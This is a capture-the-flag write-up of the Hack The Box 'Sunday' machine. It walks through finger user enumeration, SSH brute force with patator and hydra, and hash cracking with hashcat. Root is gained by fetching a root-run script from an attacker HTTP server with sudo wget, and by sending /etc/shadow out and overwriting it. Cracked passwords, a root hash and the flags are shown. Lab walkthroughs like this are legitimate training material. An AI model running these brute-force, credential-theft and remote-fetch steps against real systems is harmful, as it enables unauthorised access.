Linux Boxes

sunday

  1. nmap
    1. all ports
    2. targetted ports
  2. finger user enumeration
    1. usage
    2. scan report
      1. scan report on root
  3. ssh password brute force w/ patador & Hydra
    1. finding good password list
    2. sunny ssh_login bruteforce
  4. ssh sunny
    1. sudo -l
    2. ls /
    3. hashcat
      1. bruteforce
  5. sammy
    1. sudo -l /usr/bin/wget
      1. sudo wget -i /etc/shadow
      2. troll script
    2. privesc with /root/troll
      1. proof of overwrite /root/troll script on root
  6. potential shellshock (fail)
    1. assigning env variable to shellshock & testing
  7. privesc through wget etc/shadow
    1. wget upload.php
    2. upload.php
    3. useradd st0ve
      1. php server
      2. edit shadow
      3. wget shadow
      4. log into root
  8. privesc with /usr/bin/pfsh
  9. user/root
  10. lessons learned

sunday

images/548-1.png
images/548-2.png

nmap

images/549-1.png
Basic nmap scan shows
port 79 finger service is running version Sun Solaris fingerd
port 111 rpcbind 2-4

all ports

images/553-1.png

targetted ports

lets target ports 79, 111, 22022, 33158 and 58398

images/554-1.png
the targeted scan discovered there is an ssh terminal running on port 22022!

finger user enumeration

Theres a great enumeration tool for images/550-1.png pentestmonkey published called finger-user-enum thats a great place for us to start
images/550-2.png
images/550-3.png

feel free to download it straight off github or
images/550-4.png


or use git clone https://github.com/pentestmonkey/finger-user-enum.git to clone it
images/550-5.png

usage

finger-user-enum.pl usage
images/555-1.png

scan report

PIpe finger-user-enum to less -S to kill off line wrapping and make the report easier to read

run off names.txt wordlist from the SecList github repo
images/556-1.png

We see users sammy and sunny are unlike the other users, safe to assume they are human users and not services
images/556-2.png


->images/556-3.png

scan report on root

we can also assume that root is a user on the sunday box so lets enumerate that user as well with finger-user-enum.pl

./finger-user-enum.pl -u root -t 10.10.10.76
images/557-1.png

ssh password brute force w/ patador & Hydra

lets use patator and try to attempt to brute force an ssh login against a password list
note: hydra has ssh brute force capabilities too if you prefer and I will list the equivilent hydra command in the subsequent notes

images/559-1.png
images/559-2.png

finding good password list

since the rockyou wordlist contains over a million passwords, lets use some simple find commands on our Seclists repo (if you don't have it you can grab it here) to find an effective wordlist of a smaller size to expedite our ssh brute force


/usr/share/seclists/Passwords/
images/563-1.png

we want a wordlist that has roughly 1000-1500 common passwords since rockyou has too many for an ssh_login brute force

lets use find . -type f exec wc -l {} \; | sort -nr
images/563-2.png
images/563-3.png

Lets use ./probable-v2-top1575.txt

sunny ssh_login bruteforce

Here's Patador's usage options as well as an bruteforce example to start:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
images/561-1.png


patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed'
images/561-2.png

images/561-3.png

bingo! password sunday successfully logs into ssh via username sunny due to the ssh protocol banner being properly returned
images/561-4.png

Here is the hydra equivilent ssh brute force
hydra -l sunny -P /usr/share/wordlists/SecLists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh -s 22022
where -l is the single user sunny
-P is the password list
ssh is the bruteforce type
and -s is the port 22022 (default is 22)

images/561-5.png
hydra also finds sunny's password sunday for us!

ssh sunny

Lets first try to connect to user sunny with our bruteforced password through sunday's ssh port located on 22022
images/558-1.png
we get an error message regarding an inability to negotiate because theres no matching key exchange method between our attack machine and the Sunday machine


thankfully the server gives us a list of key exchanges that will match it
gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==
diffie-hellman-group-exchange-sha1
diffie-hellman-group1-sha1

we need a matching key exchange method, lets look up how to apply one of these key exchange methods to our ssh connection:

use -okexAlgorithms=+<algorithm> to specify which key exchange algorithm you want to use
(diffie-helman-group1-sha1 was simply easiest to type out)

images/558-2.png
images/558-3.png


and we're logged in as sunny!
images/558-4.png

sudo -l

Lets issue sudo -l first to see what permissions sunny has:
images/564-1.png

no useful information by running it
images/564-2.png

ls /

images/565-1.png

the images/565-2.png folder is NOT standard in linux home directories, lets take a look at that:

images/565-3.png

Nice theres a /etc/shadow backup folder containing login passwords for sunny and sammy
images/565-4.png

lets store both these hashes for hashcat or crackstation
images/565-5.png
images/565-6.png

hashcat

first lets research which type of hash the passwords were encrypted in: $5$

images/566-1.png

we see it is sha256crypt which is mode 7400 in hashcat

bruteforce

brute forcing hashes is much faster than brute forcing ssh so rockyou.txt works fine here:

images/567-1.png

images/567-2.png
images/567-3.png

Perfect! we cracked sammy's password to be cooldude!

sammy

lets switch users to sammy using their password cooldude we brute forced:
images/569-1.png


images/569-2.png
One thing worth noting is that the box is from November 2008, and there was a known “shellshock” vulnerability that was released not long after this time, lets check if its vulnerable:

sudo -l /usr/bin/wget

we can use wget with sudo privileges interestingly enough:

images/571-1.png


Huge find: wget allows us to use -i argument to download any files we want (even within the sunday box) as root!
images/571-2.png


images/571-3.png


sudo wget -i /etc/shadow

when wget downloads a file, it lists it, effectively leaking its contents to us, lets get started by downloading Sunday's /etc/shadow file to try and crack its hash
images/576-1.png

Lets make it easier on the eyes with awk
wget -i /etc/shadow 2>&1 | awk ‘{print $4};'
images/576-2.png
we know root's hash for potential brute force:

also looking up the hash prefix from hashcat's hash examples, we see that it is a sha256crypt hash, so we'll use module 7400 in our brute force
images/576-3.png
$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD

we'll save sunny, sammy and root's hashes in a text file for our hashcat bruteforce
images/576-4.png


hashcat -m 7400 hashes /usr/share/wordlist/rockyou.txt
images/576-5.png
unfortunately root's password hash is not on the rockyou list

troll script

if we run sudo wget /root/troll we can see that the file is just a bash script running
“testing”

images/578-1.png

we can try to rewrite it to open up a terminal and escalate to root

to do that we have to rewrite the troll bash script on our attacking machine and have sammy download it and overwrite its output where the original file was located:
images/578-2.png
images/578-3.png

spin up our http server...
images/578-4.png

and use wget to download it to our victim and execute it:
images/578-5.png

images/578-6.png

now to run it on sunny who can sudo this file:
images/578-7.png

we see it reverts back to the original script, lets use sleep in order to time running it perfectly:



privesc with /root/troll

trick here is to run /root/troll on sunny within 5 seconds before it gets rewritten

we need to use wget to grab the /root/troll script from our attacking box and overwrite it on our victim immediately running it on sunny within the 5 seconds it takes the box to revert the script:

we can use sleep and run the script as soon as we see it hit our HTTP server:

Lets get the commands ready on each terminal (I like using terminator for a split shell environment but tmux is a great option as well if you're familiar with it)

sleep 5; sudo wget 10.10.14.62:8000/troll -O /root/troll
sudo /root/troll
images/579-1.png

VOILA! we got root on sunny
images/579-2.png


proof of overwrite /root/troll script on root

This is just proof that the /root/troll file was getting updated every 5 seconds and we needed to be timely executing it via sunny:

images/583-1.png

potential shellshock (fail)

images/572-1.png
One thing worth noting is that the box is from November 2008, and there was a known “shellshock” vulnerability that was released not long after this time, lets check if its vulnerable:



first hop back onto user sunny
images/572-2.png

create a random variable, and issue the shellshock payload as such and then issue a
'(){ :;}; <random command>' <real cmd>

shellshock is (){ :;};
images/572-3.png


appears to be vulnerable! this is what calling echo would look like without the shellshock payload:
images/572-4.png

as we can see echo doesnt execute

assigning env variable to shellshock & testing

doesnt say any environment tools are being kept but we're going to pick one anyway:

images/573-1.png

do one we think we can use that has not changed:
LOGNAME


The box will be shellshock vulnerable if we see echo shellshock output when we call sudo /root/troll\
images/573-2.png
Booo! the box is not vulnerable to shellshock through sudo

privesc through wget etc/shadow

lets use wget to put our victim's /etc/shadow file onto our attacking machine and then upload it back so we can ssh with a known password back to root

search wget -h to find a way how to PUT files
images/581-1.png
images/581-2.png

unfortunately no options for changing method to a PUT request.... but if we write a script that handles Post files on our attacking machine

lets set up a listener on our machine first and write a --post-file to it from our victim sammy
images/581-3.png

images/581-4.png

images/581-5.png

wget upload.php

now instead of just connecting to our attack machine, lets go to a script we create that we'll call upload.php and an argument of the filename

images/585-1.png

now were handling POST request with a argument and a file attached... we can work with this
images/585-2.png

upload.php

images/587-1.png
images/587-2.png
there are several vulnerabilities with this script that allow a user to escape our ‘upload/’ directory, upload a script and execute it...

we can fix that by playing with umask settings filtering the user from inputting a “../” and escaping our directory
images/587-3.png

useradd st0ve

we don't want to write exploitable code owned by root on our attacking machine so we're going to add a user with limited permissions

images/586-1.png

set st0ve user to own upload folder with chown st0ve upload/
images/586-2.png

cdmod 222 for test so no user (besides root) can write to it:
images/586-3.pngimages/586-4.png

php server

this server can upload and execute php files, it is not commonly used over python -m simpleHTTPServer but still works great
images/588-1.png is the command

images/588-2.png

Now we can upload /etc/shadow to our IP and creates the file shadow
images/588-3.png

this uploads shadow to our /upload directory images/588-4.png
images/588-5.png

edit shadow

before:
images/590-1.png

after overwriting root's hash with sammy's
images/590-2.png


finally change the shadow file permissions so st0ve (or the user you created) can write to it:
images/590-3.png

wget shadow

lastly we upload our new shadow file to our victim's /etc/shadow folder

first copy our shadow file down a folder to /php/ (or make a new directory within your Sunday directory)
images/591-1.png

images/591-2.png


Success!
images/591-3.png

log into root

now we can switch user to root using sammy's password which was cooldude!

and we're in!
images/592-1.png


privesc with /usr/bin/pfsh

I don't know if this was intended but running pfsh is a shell that runs with root privileges

images/589-1.png


user/root

images/582-1.png
a3d9498027ca5187ba1793943ee8a598

images/582-2.png
fb40fab61d99d37536daeec0d97af9b8

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1965-1.png


1. Fun box where you enumerate users on finger service the box runs, find it has an ssh port on an uncommon port
2. from there you get sunny user by either guessing their password or using an ssh brute force prorgram like protator
3. you hop on sunny and see it can run a file called /root/troll as root without a sudo password and that there is a backup log with an old /etc/shadow list
4. you can brute force user sammy's hash from the old /etc/shadow list using hashcat
5. from there you notice sammy can run wget as root without a password so there are two main ways I showed how to priv esc utilizing sunny/sammy to rewrite /troll/root OR you can reupload /etc/shadow to the box with sammy from your attacking machine and log into root with a known password